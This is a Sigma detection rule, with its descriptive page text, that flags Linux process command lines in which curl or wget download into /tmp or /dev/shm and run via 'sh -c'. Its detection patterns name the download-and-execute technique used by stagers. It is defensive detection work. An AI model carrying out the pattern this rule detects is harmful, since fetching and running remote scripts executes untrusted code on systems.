Suspicious Download and Execute Pattern via Curl/Wget

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.

Sigma rule (View on GitHub)

 1title: Suspicious Download and Execute Pattern via Curl/Wget
 2id: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
 3status: experimental
 4description: |
 5    Detects suspicious use of command-line tools such as curl or wget to download remote
 6    content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
 7    immediate execution, indicating potential malicious activity. This pattern is commonly used
 8    by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.    
 9references:
10    - https://gtfobins.github.io/gtfobins/wget/
11    - https://gtfobins.github.io/gtfobins/curl/
12author: Aayush Gupta
13date: 2025-06-17
14tags:
15    - attack.execution
16    - attack.t1059.004
17    - attack.t1203
18logsource:
19    category: process_creation
20    product: linux
21detection:
22    selection_downloader:
23        CommandLine|contains:
24            - '/curl'
25            - '/wget'
26    selection_tmp:
27        CommandLine|contains:
28            - '/tmp/'
29            - '/dev/shm/'
30    selection_executor:
31        CommandLine|contains: 'sh -c'
32    condition: all of selection_*
33falsepositives:
34    - System update scripts using temporary files
35    - Installer scripts or automated provisioning tools
36level: high

References

Related rules

to-top